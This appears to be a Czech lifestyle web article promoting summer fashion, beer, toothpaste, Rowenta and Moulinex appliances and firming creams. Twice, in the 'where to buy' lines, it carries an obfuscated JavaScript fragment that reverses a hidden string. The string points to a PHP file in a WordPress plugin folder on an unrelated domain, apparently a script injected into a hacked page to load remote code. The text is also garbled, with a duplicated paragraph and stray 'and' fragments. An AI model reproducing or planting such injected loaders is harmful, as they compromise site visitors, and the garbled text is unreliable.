FACESTARŽivotní stylOSM KOUSKŮ V TRENDY ŽLUTÉ! NEBOJTE SE ZAZÁŘIT!

OSM KOUSKŮ V TRENDY ŽLUTÉ! NEBOJTE SE ZAZÁŘIT!

Zlatá barva, dlouhé třásně, maxi sukně a výrazné vzory, to jsou základní elementy světových návrhářů a módních domů jarních a letních přehlídek 2014. Není tedy žádným překvapením, že Etno styl je jedním z nejžhavějších trendů léta. I značka Mohito se nechala tímto trendem inspirovat a v řadě „New Etno“ najdete klasiku se sportovním nádechem. Samozřejmě vše stále potrhující ženskost, jak je již u Mohito klasikou. Najdete zde barvy jako měděnou, zlatou, černou a bílou.

Zlatá barva, dlouhé třásně, maxi sukně a výrazné vzory, to jsou základní elementy světových návrhářů a módních domů jarních a letních přehlídek 2014. Není tedy žádným překvapením, že Etno styl je jedním z nejžhavějších trendů léta. I značka Mohito se nechala tímto trendem inspirovat a v řadě „New Etno“ najdete klasiku se sportovním nádechem. Samozřejmě vše stále potrhující ženskost, jak je již u Mohito klasikou. Najdete zde barvy jako měděnou, zlatou, černou a bílou.

and

Nechte se zlákat jedinečným pivem Desperados, které ve vás probudí vaše rebelské já! Jde o unikátní kombinaci ležáku s příchutí tequily a jemných ovocných podtónů obsahující 5,9 % objemu alkoholu. Drink je díky své chuťové vyváženosti a lehké perlivosti velmi oblíbený po celém světě. Desperados by měl být všude, kde se konají divoké párty, proto se s ním lidé setkají v nejlepších českých klubech a barech. Svým designem odkazuje k latino kořenům a nezávislému rebelskému charakteru! Desperados prostě budete milovat – nejen pro jeho kvalitu a chuť, ale i díky prémiovému vzhledu a komunikaci, která se nebojí jít tak trochu za hranu. 

andand

Novinkou letošního jara je nová bylinná zubní pasta HERBADENT Homeo. Svým jedinečným složením si získá všechny, kterým záleží na složení dentálních produktů a zdraví celé rodiny. HERBADENT Homeo neobsahuje fluor ani menthol, je proto vhodná pro péči o zuby a dásně při homeopatické léčbě, pro malé děti, které pastu polykají, i pro všechny, kteří chtějí používat pro každodenní ústní hygienu bylinnou péči. Má nasládlou chuť ženšenu, obsahuje velmi jemné abrazivní složky a neobsahuje chemické pěnidlo. Zubní pastu vyrábí tradiční český výrobce Herbadent a zakoupíte ji v lékárnách nebo ordinacích stomatologů. 

andand

Stylingový produkt pro objem vlasů Rowenta Volum’24 Respectissim je speciálně navržen tak, aby vlasům dal maximální objem po maximální dobu a zároveň zachoval stoprocentní sílu a odolnost vlasů během žehlení. To vše v rekordním čase okolo 10 minut. Perfektní výsledek zaručuje unikátní rotační nahřívací váleček, který působí jako velká natáčka a vytváří oblouk z vlasů od kořínků. Zdvihá vlas pro objemový efekt a brání zplihnutí vlasu. Jelikož jsou jemné vlasy náchylné k poškození, péče o ně je velmi důležitá. Volume´24 Respectisism používá pečující teplotu 170 stupňů Celsia, která je šetrná k vlasu, uchovává jeho krásu a zdraví, ale zároveň vytváří maximální objem, který vydrží.  Profesionální povrch Ultra Shine Nano Ceramic poskytuje vlasu vysokou ochranu vlasu a lesk a zvyšuje efektivitu stylingu. Integrovaný iontový generátor umožňuje rovnoměrnou distribuci produkovaných iontů do celého pramene vlasů. Dodává zrcadlový lesk, eliminuje statickou elektřinu, díky čemuž vlasy nepoletují a dají se snadno upravit. Thermo protect system chrání vlasovou pokožku před teplem a umožňuje vytvářet objem od kořínků. K dostání na $nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandcook.cz“>www.homeandcook.cz   

Vysavač Rowenta Compacteo Ergo Cyclonic Power s Animal care funkcí je ideální pro menší či středně velké domácnosti a vysoce účinný pro vysávání zvířecích chlupů ze všech běžných typů podlahových krytin a nábytku. Disponuje cyklónovou technologií pro optimální oddělení nečistot a udržení sací síly na vysoké úrovni. Kompaktní velikost pro optimální skladování. Úroveň hluku: 84 db(a) a filtrace: hepa 10.

and

Odšťavňovač Moulinex Infiny Press Revolution pro vás během pár vteřin připraví ty nejlahodnější čerstvé džusy nebo chutné polévky podle vašich představ. Bez problému odšťavňuje veškeré ovoce a zeleninu a je opravdovým specialistou na červené ovoce a bylinky. Rozmanitosti se tak meze nekladou. Navíc vylepšenou technologií pomalého lisování získáte až o 30% více šťávy a vitamínů, a až o více než 75% antioxidantů. Technologie pomalého lisování zaručuje velice tichý chod oproti běžným odšťavňovačům pracujícím na bázi odstřeďování. K dostání na $nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandcook.cz“>www.homeandcook.cz

andand
Na léto zpevněný dekolt a paže pomocí biotechnologické emulze na formování, vypínání a zpevnění krku, dekoltu a paží FC Decoletteceutical. Krku, dekoltu, pažím nebo výstřihu věnujeme obvykle mnohem méně pozornosti jako tváři. Zpevňující a tvarující emulze Decoletteceutical, určená na formování, vypínání a zpevnění krku, dekoltu a paží, je založena na liftingovém komplexu, který podporuje ženské tvary. Díky zpevňujícím látkám obsaženým v přípravku má okamžitý účinek.  Aktivní molekula – peptid, který je zde obsažen, proniká po nanesení přes povrch pokožky a dosahuje fibroblastové buňky. Důležitou předností je, že tento účinek lze uplatnit bez zákroků plastické chirurgie a medicíny. Pomáhá chránit a zpevňovat krk, dekolt a paže, obnovovat a zpevňovat podpůrnou kožní tkáň těchto partií a zároveň ochraňuje proti škodlivým účinkům volných radikálů, které způsobují předčasné ochabování pokožky. K dostání v lékárnách či na internetu.

Biotechnologická emulze na zpevnění a tonizaci poprsí FC Bustyceutical. Poprsí je jednou z nejcitlivějších složek osobní krásy ženy, proto si vyžaduje speciální péči a pozornost. Používání přípravku je doporučeno pro všechny věkové kategorie žen, hlavně pro ženy po porodu, ženy ve zralém věku, jakož i pro starší věkové kategorie. Biotechnologická emulze Bustyceutical s liftingovou péčí se silným vyhlazujícím účinkem pro kožní tkáně poprsí, zvyšující jejich denzitu a pevnost. Přípravek s kombinací biotechnologického původu a syntézy peptidů byl navržen jako reakce na tyto požadavky stimulace. Přípravek obsahuje biotechnologický bakteriální filtrát bohatý na stimulační a růstové faktory, dva druhy amfifilických peptidů a je obohacený o mandlový olej. Biopeptidy se takto podílejí na restrukturalizaci a zpevnění tkáně. 

andand

Související články